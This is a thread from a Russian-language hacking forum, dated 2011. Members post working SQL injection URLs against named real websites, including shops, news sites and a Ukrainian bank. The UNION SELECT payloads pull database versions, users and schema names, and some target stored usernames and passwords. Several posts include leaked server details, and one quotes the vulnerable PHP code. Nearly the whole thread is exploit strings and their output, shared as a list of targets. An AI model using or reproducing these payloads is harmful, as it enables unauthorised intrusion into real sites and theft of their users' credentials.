 |
|

05.10.2011, 15:09
|
|
Новичок
Регистрация: 07.09.2011
Сообщений: 20
Провел на форуме: 5323
Репутация:
0
|
|
http://www.autodostavka.ru/index.php?id=729&model=-981%20UNION%20ALL%20SELECT%201,2,3,4,5,6,group_con cat%28username,password%29,8,9,10,11,12%20from%20r egusers
|
|
|

06.10.2011, 22:35
|
|
Участник форума
Регистрация: 24.06.2010
Сообщений: 134
Провел на форуме: 45597
Репутация:
0
|
|
http://shownewstv.ru/taunew/index.php?id=5227-999.9+union+select+1,2,3,4,version(),6,7,8,user(), 10,database(),12,13,14,15,16,17--
5.1.49-1ubuntu8.1
shownews@localhost
DB: wwwshownewstvru
http://avtozapchasty.ru/shop/i.php?id=288821-999.9+union+select+1,2,version(),4,5,6,user(),8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
5.5.16-log 6
cck135@WIN-BZW07G9C3OB
|
|
|

07.10.2011, 08:41
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме: 124363
Репутация:
11
|
|
Код:
http://faq.freecity.de/support/faq_showfaq.phtml?id=-85+union+select+1,version()+--+&katname=K%C3%BCndigung
4.0.24_Debian-10sarge2-log
pr4
alexa 384,252
|
|
|

07.10.2011, 08:54
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме: 124363
Репутация:
11
|
|
Код:
http://www.salue.de/nachrichten/message.phtml?id=-14895+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21+--+
pr 5
alexa 272,965
|
|
|

07.10.2011, 10:53
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме: 40748
Репутация:
78
|
|
Код:
http://roston.cz/czechdjs/?section=karta&id=1+and+1=2+union+select+1,2,3,4,5,6,user(),0x61,9,10,11,12,13,14,version(),database(),17,18,19+--+
так же идет opendir('foto/' . $_GET['id']), и инклудится файл inc-kalendar-10-2011.txt.
|
|
|

07.10.2011, 21:23
|
|
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
Провел на форуме: 45485
Репутация:
1
|
|
ГАЗклуб:
Код:
http://www.gazclub.ru/faq/?mess_id=-1+union+select+null,mysql.user.password,null,null+from+mysql.user
u9884_2'@'10.8.1.198
PageRank - 0
Yandex тИЦ - 120
|
|
|

08.10.2011, 19:53
|
|
Новичок
Регистрация: 04.10.2011
Сообщений: 13
Провел на форуме: 2356
Репутация:
0
|
|
http://www.danielbank.kiev.ua/index.php?action=news&type=det&id=79{SQLINJ}
MySQL 5.2.2.
DataBase: danielbank
|
|
|

10.10.2011, 18:28
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Old School CMS 2010
root@vsevbanu.ru:5.0.51a-24+lenny4-log:vvb
Сообщение от None
http://www.vsevbanu.ru/post.php?id=-82+UnIon+selECt+1,concat_ws(0x3a,user(),version(), database()),(select(@x)from(select(@x:=0x00),(sele ct(0)from(information_schema.columns)where(table_s chema!=0x696e666f726d6174696f6e5f736368656d61)and( 0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e ,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10+--+
Уязвимость пресутствует из-за отсутствия фильтрации данных в парамитре ID
post.php
Сообщение от None
if(!empty($_GET['id'])){$id =
$_GET['id']
;}
else $id = 1;
$show = $_GET['show'];
// вывод содержимого страницы;
$sql = "SELECT * FROM `pora` WHERE id =
$id
AND type = 'art'";
$result = mysql_query($sql);
$cont = mysql_fetch_object($result);
|
|
|

10.10.2011, 18:41
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме: 247684
Репутация:
136
|
|
http://www.showbilet.ru/index.php?nav=1&page=3&id=-10%20and%201=2%20union%20select%201,concat_ws(char (58),@@version,user(),database(),@@version_compile _os),3,4,5,6,7,8,9,10--
4.0.27-log showbile@v27.valuehost.ru showbile portbld-freebsd7.1
|
|
|

10.10.2011, 21:49
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме: 102906
Репутация:
-14
|
|
тиЦ 20 PR 2
Сообщение от None
http://weldteam.ru/pages.php?id=999999/*++*/union/*++*/select/*++*/concat_ws%280x3a,user%28%29,version%28%29,database %28%29%29,2,3+--+
dexx@localhost:5.0.51a-24+lenny5:dex
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|